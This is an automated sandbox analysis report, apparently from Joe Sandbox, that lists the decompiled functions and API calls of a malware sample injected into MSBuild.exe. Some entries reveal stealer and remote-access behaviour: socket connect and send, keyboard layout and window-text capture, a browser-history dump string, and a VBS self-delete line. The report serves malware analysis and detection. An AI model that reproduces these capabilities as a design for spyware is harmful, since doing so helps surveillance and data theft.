                                                                                                                                                                                    • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                    • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                                    • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                                                                                                                      • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                                                                                                                    • _free.LIBCMT ref: 0044E1A0
                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                                                    • Opcode ID: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                                                                                                                                                                                    • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                                                                                                                    • Opcode Fuzzy Hash: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                                    • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                                    • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                    • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                    • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2951400881-0
                                                                                                                                                                                    • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                                                                                    • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                                                                                                                    • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$lstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 493641738-0
                                                                                                                                                                                    • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                    • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 100091D0
                                                                                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                    • _free.LIBCMT ref: 100091E2
                                                                                                                                                                                    • _free.LIBCMT ref: 100091F4
                                                                                                                                                                                    • _free.LIBCMT ref: 10009206
                                                                                                                                                                                    • _free.LIBCMT ref: 10009218
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                    • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 0044F7B5
                                                                                                                                                                                      • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                                      • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                                                    • _free.LIBCMT ref: 0044F7C7
                                                                                                                                                                                    • _free.LIBCMT ref: 0044F7D9
                                                                                                                                                                                    • _free.LIBCMT ref: 0044F7EB
                                                                                                                                                                                    • _free.LIBCMT ref: 0044F7FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                    • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 1000536F
                                                                                                                                                                                      • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                      • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                    • _free.LIBCMT ref: 10005381
                                                                                                                                                                                    • _free.LIBCMT ref: 10005394
                                                                                                                                                                                    • _free.LIBCMT ref: 100053A5
                                                                                                                                                                                    • _free.LIBCMT ref: 100053B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                    • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                                    • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 00443305
                                                                                                                                                                                      • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                                                                      • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                                                                    • _free.LIBCMT ref: 00443317
                                                                                                                                                                                    • _free.LIBCMT ref: 0044332A
                                                                                                                                                                                    • _free.LIBCMT ref: 0044333B
                                                                                                                                                                                    • _free.LIBCMT ref: 0044334C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                    • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                                                    • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                                      • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                                                                      • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                    • String ID: (FG
                                                                                                                                                                                    • API String ID: 3142014140-2273637114
                                                                                                                                                                                    • Opcode ID: ebe0a4eb5fde01a48d90012b115cc049424e40b4c1d84d5979612c145f060519
                                                                                                                                                                                    • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                                                                                                    • Opcode Fuzzy Hash: ebe0a4eb5fde01a48d90012b115cc049424e40b4c1d84d5979612c145f060519
                                                                                                                                                                                    • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                      • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                      • Part of subcall function 0040428C: connect.WS2_32(?,00FFB490,00000010), ref: 004042A5
                                                                                                                                                                                      • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002E0,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                    • String ID: XCG$`AG$>G
                                                                                                                                                                                    • API String ID: 2334542088-2372832151
                                                                                                                                                                                    • Opcode ID: cae74dba3d0bdf8ce2325287343af9926fac7638ec68cb4c548e08abd9503b01
                                                                                                                                                                                    • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                                                                                    • Opcode Fuzzy Hash: cae74dba3d0bdf8ce2325287343af9926fac7638ec68cb4c548e08abd9503b01
                                                                                                                                                                                    • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 10004C1D
                                                                                                                                                                                    • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                                    • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4122973841.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4122947079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4122973841.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_10000000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                    • API String ID: 2506810119-4083458154
                                                                                                                                                                                    • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                    • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                                    • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                                    • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                                                                                                                                                    • _free.LIBCMT ref: 004427DF
                                                                                                                                                                                    • _free.LIBCMT ref: 004427E9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                    • API String ID: 2506810119-4083458154
                                                                                                                                                                                    • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                                                                    • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                                                                      • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                      • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                      • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                    • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                                    • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                                                                    • API String ID: 368326130-2663660666
                                                                                                                                                                                    • Opcode ID: 920b09462075738fc089aedf2819a9ce5fb0ecb40febecb08b497b43e074ee2d
                                                                                                                                                                                    • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 920b09462075738fc089aedf2819a9ce5fb0ecb40febecb08b497b43e074ee2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateExecuteExitFileProcessShell
                                                                                                                                                                                    • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                                                                                                    • API String ID: 2309964880-3562070623
                                                                                                                                                                                    • Opcode ID: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                                                                                                    • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 390205f58295ca3481fe5ab8602b7fa4db45e117a05dec8e4925fefabcc5de7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EventLocalTimewsprintf
                                                                                                                                                                                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                                                                    • API String ID: 1497725170-1359877963
